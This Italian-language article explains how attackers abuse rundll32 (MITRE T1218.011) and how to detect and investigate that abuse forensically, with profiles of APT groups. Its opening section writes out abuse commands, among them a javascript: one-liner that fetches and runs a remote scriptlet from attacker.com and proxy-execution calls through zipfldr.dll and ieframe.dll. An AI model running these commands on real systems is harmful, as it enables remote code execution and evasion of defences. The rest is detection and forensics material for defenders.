Abuso di Rundll32: Signed System Binary Proxy Execution: Rundll32 (T1218.011)

L'esecuzione di payload attraverso rundll32 richiede precisione nella sintassi e comprensione delle diverse modalità di abuso. Il comando base segue il formato rundll32.exe {DLLname},{FunctionName}, ma le varianti sono numerose e creative.

Per testare l'esecuzione diretta di una DLL personalizzata, puoi utilizzare:

rundll32.exe C:\temp\malicious.dll,EntryPoint

APT28 ha dimostrato particolare creatività nell'uso di rundll32, salvando script batch che richiamano il binario per eseguire payload DLL. Un approccio più sofisticato sfrutta le funzioni non documentate di shell32.dll per eseguire file .cpl:

rundll32.exe shell32.dll,Control_RunDLL payload.cpl

L'esecuzione di JavaScript attraverso rundll32 rappresenta una delle tecniche più eleganti, utilizzata dal malware Poweliks. La sintassi richiede particolare attenzione agli escape dei caratteri:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://attacker.com/payload.sct")"

Per offuscare l'analisi, gli attaccanti sfruttano la gestione dei character set di Windows. Rundll32 cerca prima la versione Wide (Unicode) di una funzione, poi ANSI, infine quella standard. Creando funzioni duplicate con suffissi W e A, è possibile nascondere il codice malevolo:

rundll32.exe suspicious.dll,LegitFunctionW

Anche le DLL di sistema firmate Microsoft possono essere abusate. FIN7 e altri gruppi utilizzano zipfldr.dll e ieframe.dll per proxy execution:

rundll32.exe zipfldr.dll,RouteTheCall payload.exe
rundll32.exe ieframe.dll,OpenURL https://malicious.site

L'esportazione tramite numero ordinale offre ulteriore offuscamento:

rundll32.exe malicious.dll,#1

Su Linux con Wine installato, è possibile testare comportamenti simili per comprendere meglio la tecnica cross-platform.

La detection efficace di rundll32 malevolo richiede un approccio multi-layer che bilanci accuratezza e gestibilità dei falsi positivi. Il monitoraggio deve concentrarsi su pattern comportamentali anomali piuttosto che sulla semplice presenza del processo.

Per Windows, configura Sysmon per catturare dettagliatamente le esecuzioni di rundll32. L'EventCode 1 (Process Creation) deve includere la command line completa. Cerca pattern sospetti come:

• Esecuzione di DLL da directory temporanee o user-writable
• Utilizzo della sintassi javascript: o vbscript:
• Parametri Control_RunDLL o RunHTMLApplication
• DLL con nomi generici o casuali in percorsi non standard

L'EventCode 7 (Image/DLL Load) di Sysmon rivela quali DLL vengono effettivamente caricate. Cross-correla questi eventi con l'EventCode 1 per identificare discrepanze tra la DLL specificata nella command line e quelle realmente caricate.

Per il network monitoring, l'EventCode 3 (Network Connection) è critico. Rundll32 che stabilisce connessioni verso IP esterni o domini non categorizzati richiede investigazione immediata. Sandworm Team ha utilizzato backdoor che sfruttavano rundll32 per comunicazioni C2.

La behavioral analysis deve considerare il processo parent. Rundll32 lanciato da Office applications, browser, o script interpreters indica potenziale compromissione. APT32 ha sfruttato questa catena per le infezioni iniziali.

Implementa allowlist dinamiche basate sull'ambiente. Le DLL legittime variano tra workstation e server. Documenta le esecuzioni normali di rundll32 per almeno 30 giorni prima di attivare alerting aggressivo.

Per ridurre i falsi positivi, correla multiple data source:

• Process creation con parametri sospetti
• DLL load da percorsi anomali
• Network connections inaspettate
• File creation in directory temporanee pre-esecuzione

La retention dei log deve permettere correlation su finestre temporali estese. Molti attacchi utilizzano rundll32 in fasi multiple distanziate nel tempo.

L'analisi forense di rundll32 richiede attenzione ai dettagli e correlazione di molteplici artefatti. La persistenza dei metadati varia significativamente tra i diversi elementi coinvolti nell'esecuzione.

Su Windows, il Prefetch fornisce evidenze preziose. I file .pf per rundll32.exe contengono hash del percorso che differenziano esecuzioni con parametri diversi. Analizza %SystemRoot%\Prefetch\RUNDLL32.EXE-*.pf per identificare:

• Timestamp di esecuzione multipli
• DLL e dipendenze caricate
• Directory accessed durante l'esecuzione

L'Application Compatibility Cache (ShimCache) registra l'esecuzione di DLL attraverso rundll32. La chiave SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache preserva questi dati anche dopo il reboot.

Per ricostruire la timeline, esamina l'Event Log di Windows. Security EventID 4688 (Process Creation) con audit dettagliato cattura la command line completa. Correla con System EventID 7045 per identificare se rundll32 è stato utilizzato per installare servizi.

L'USN Journal registra la creazione e modifica di DLL sospette. Cerca pattern temporali dove:

1. Una DLL viene creata in directory temporanea
2. Rundll32.exe accede alla DLL entro pochi secondi
3. La DLL viene eliminata dopo l'esecuzione

Gamaredon Group utilizzava questa sequenza per i propri loader. Il $MFT preserva timestamp anche dopo deletion, permettendo recovery parziale.

L'analisi della memoria volatile può rivelare DLL injection. Rundll32 processes con moduli non-Microsoft caricati indicano potenziale compromissione. APT19 configurava payload per injection diretta in rundll32.exe.

Su Linux/macOS con Wine, cerca tracce in:

• ~/.wine/drive_c/windows/prefetch/
• Wine debug logs con WINEDEBUG=+dll
• Unified logs per esecuzioni Wine anomale

La correlation tra filesystem, registry, e network artifacts è essenziale. Carbanak installava VNC attraverso rundll32, lasciando tracce in:

• Registry Run keys con rundll32 commands
• Network connections su porte VNC
• DLL create in %AppData%

Documenta precisamente l'offset temporale tra creazione DLL, esecuzione rundll32, e attività network per stabilire attribution.

L'analisi dei pattern di utilizzo di rundll32 rivela indicatori comportamentali distintivi tra i diversi gruppi APT. Ogni attore tende a standardizzare approcci specifici che diventano signature operative.

APT28 (Russia GRU) mostra predilezione per l'esecuzione di CHOPSTICK attraverso rundll32 con naming convention prevedibili. Utilizzano tipicamente twain_64.dll o nomi che mimano componenti Windows legittime. I loro loader salvano batch script che automatizzano sequenze rundll32, un pattern osservabile across campagne dal 2015 al 2021.

Lazarus Group (Corea del Nord) implementa approcci più sofisticati. Durante Operation Dream Job hanno eseguito thumbnail.db attraverso rundll32 con parametri numerici complessi come "CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905". Questa apparente randomizzazione segue in realtà pattern matematici identificabili.

FIN7 (Criminali finanziari) privilegia l'uso di rundll32 all'interno di catene di infection più ampie. La loro integrazione con Cobalt Strike mostra esecuzione di DLL beacon attraverso rundll32, spesso preceduta da PowerShell stagers. Il gruppo mantiene consistenza nei percorsi di staging, preferendo %APPDATA%\Microsoft.

Kimsuky (Corea del Nord) combina rundll32 con tecniche di social engineering elaborate. Utilizzano documenti Office che dropano e eseguono DLL attraverso macro, con rundll32 come meccanismo di execution finale. Dal 2021 osservata evoluzione verso JavaScript execution via mshtml.

I trend emergenti mostrano:

• Maggiore uso di DLL di sistema legittime per proxy execution
• Offuscamento attraverso character encoding (Unicode/ANSI)
• Integrazione con supply chain attacks dove rundll32 esegue componenti compromessi
• Combinazione con side-loading di DLL legittime modificate

La geografia dell'utilizzo mostra concentrazioni in campagne contro:

• Europa orientale: Focus su twain/scanner DLL names (APT28)
• Asia-Pacifico: JavaScript execution prevalente (Lazarus, Kimsuky)
• Settore finanziario globale: Integrazione con RAT commerciali (FIN7)

La presente analisi si basa sul framework MITRE ATT&CK per la tecnica T1218.011 - Rundll32, parte della tattica Defense Evasion. Le informazioni sui gruppi APT e le campagne documentate derivano dall'intelligence gathering di MITRE ATT&CK, che aggrega report di sicurezza da fonti multiple. Per approfondimenti sulle detection strategies e implementation guidance, consultare le risorse MITRE ATT&CK e i vendor di sicurezza citati nelle campagne specifiche.